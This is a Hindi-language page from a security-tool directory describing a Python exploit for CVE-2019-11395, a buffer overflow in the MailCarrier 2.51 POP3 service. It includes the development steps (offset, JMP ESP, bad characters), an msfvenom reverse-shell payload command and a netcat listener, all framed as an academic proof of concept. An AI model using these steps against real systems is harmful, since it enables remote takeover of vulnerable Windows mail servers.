Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11395 — CVE-2019-11395 के लिए Python एक्सप्लॉइट, MailCarrier 2.51 POP3 सेवा में एक बफर ओवरफ्लो। msfvenom के माध्यम से रिवर्स शेल पेलोड उत्पन्न करता है और Windows लक्ष्यों पर दूरस्थ कोड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/caioprince/cve-2019-11395
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

CVE-2019-11395 के लिए Python एक्सप्लॉइट, MailCarrier 2.51 POP3 सेवा में एक बफर ओवरफ्लो। msfvenom के माध्यम से रिवर्स शेल पेलोड उत्पन्न करता है और Windows लक्ष्यों पर दूरस्थ कोड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-11395 शोषण 🛡️

CVE-2019-11395 के बारे में 🕵️

CVE-2019-11395 भेद्यता MailCarrier 2.51 ईमेल एप्लिकेशन में बफर ओवरफ्लो भेद्यता का वर्णन करती है, जो दूरस्थ कोड निष्पादन की अनुमति देती है। यह भेद्यता SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, या POP3 RETR प्रक्रियाओं में होती है।

शैक्षणिक अध्ययन के दौरान, POP3 प्रक्रियाओं पर ध्यान केंद्रित किया गया था ताकि एक प्रूफ ऑफ कॉन्सेप्ट (PoC) बनाया जा सके। यह पहचाना गया कि एप्लिकेशन को 6000 बाइट्स भेजने से यह काम करना बंद कर देता है, जिससे बफर ओवरफ्लो भेद्यता का पता चलता है।

शोषण चरण 🔍

  1. EIP को सटीक रूप से पहचानने के लिए msf-pattern_create -l 6000 का उपयोग किया गया।
  2. EIP ऑफ़सेट को msf-pattern_offset -q 6E47386E -l 6000 के साथ पहचाना गया, जिसके परिणामस्वरूप EIP ऑफ़सेट 5095 प्राप्त हुआ।
  3. ASLR अक्षम के साथ expsrv.dll की पहचान की गई, जो JMP ESP के लिए उपयुक्त है।
  4. अमान्य वर्णों के परीक्षण के दौरान बुरे वर्ण \x00\x0a\x0d की पहचान की गई।
  5. पेलोड उत्पन्न किया गया msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode के साथ।
  • पेलोड को समायोजित करने के लिए CVE-2019-11395.py कोड में संशोधन किया गया।
  • nc -lnvp 4444 के साथ कनेक्शन खोला गया और शोषण (CVE-2019-11395.py) को निष्पादित किया गया ताकि पर्यावरण तक पहुंच प्राप्त हो सके और वर्णित CVE को मान्य किया जा सके।
  • उपयोग 🚀

    शोषण का उपयोग करने के लिए इन चरणों का पालन करें:

    1. msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode का उपयोग करके पेलोड उत्पन्न करें।
    2. msfvenom कमांड के आउटपुट को कॉपी करें।
    3. CVE-2019-11395.py कोड में shellcode वेरिएबल को msfvenom कमांड से प्राप्त आउटपुट से बदलने के लिए समायोजित करें।
    4. शोषण (CVE-2019-11395.py) को निष्पादित करें ताकि पर्यावरण तक पहुंच प्राप्त हो सके और वर्णित CVE को मान्य किया जा सके।

    समझौता किया गया वातावरण 📸

    PoC CVE-2019-11395

    🔗 मुझसे जुड़ें

    मेरी प्रोफ़ाइल देखें LinkedIn पर

    टूल डाउनलोड करें